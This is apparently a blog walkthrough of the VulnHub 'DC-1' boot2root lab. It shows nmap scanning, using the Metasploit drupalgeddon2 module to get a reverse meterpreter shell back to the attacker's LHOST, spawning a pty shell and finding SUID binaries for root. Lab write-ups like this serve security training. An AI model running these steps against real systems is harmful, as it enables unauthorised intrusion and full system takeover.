DC-1 Walkthrough - By darkxploiter

 Hello all, I would like to thank you for reading this blog. Today I am going to complete another boot2root challenge of a box known as “DC-1” and all the credit goes to @DCAU for creating this box. So, our challenge is to get root access to this machine. To download this go to vulnhub.com

Or 

https://www.vulnhub.com/?q=dc-1



This is a beginner-level machine.


Methods taken:


  1. nmap For IP discovery

  2. Network Scanning with nmap

  3. HTTP port surfing (port number 80)

  4. Finding Drupal CMS

  5. Finding Drupal version

  6. Finding exploit for Drupal version

  7. Exploiting with metasploit to get a reverse shell as a normal user

  8. Finding a way to get into the root shell

  9. Taking root shell and capturing the flag



Walkthrough steps:

Step 1:

IP discovery:


nmap -sn 192.168.56.1/24


Step 2:

Network Scanning:


Step 3:

If we look at the nmap result we can see port 80 is open. So, we can go through this port to see what is up there. To check this I am going to open the IP on my web browser. So, here we can see a Drupal CMS site is there.

I have gone through the source page but nothing important was found so I am not attaching the screenshot which you can check by yourself (on the web page press ctrl+u).

Again if we take a look at the Nmap result then we will see that a Drupal version 7 CMS is running. Now I googled for vulnerability for this specific version then I found there is an exploit in Metasploit which is


exploit/unix/webapp/drupal_drupalgeddon2


Step 4:


Exploiting the target with this exploit:


First, use the exploit with the command use <name_of_the_exploit>

Looking for the options which it is requiring with

show options

As we can see we need to set the RHOSTS and LHOST

msf6>set RHOSTS 192.168.56.109

msf6>set LHOST 192.168.56.101

show options for checking that every option is set successfully.

So everything looks fine here.

Now, exploit.

And we got the meterpreter shell.

Without wasting any time I am going to system shell with the shell command.

It is saying that Channel 0 created. That means we got the shell. Now, use python spawn the shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Moving to the home directory and finding flags there.


Step 5:


Getting root:

Find / -perm -u=s -type f 2>/dev/null

find is there with root permission so we can exploit it to get root.

Step 6:

Grabbing the root flag:


So many thanks to you for reading my blog. Have a nice day. :)

Comments

Post a Comment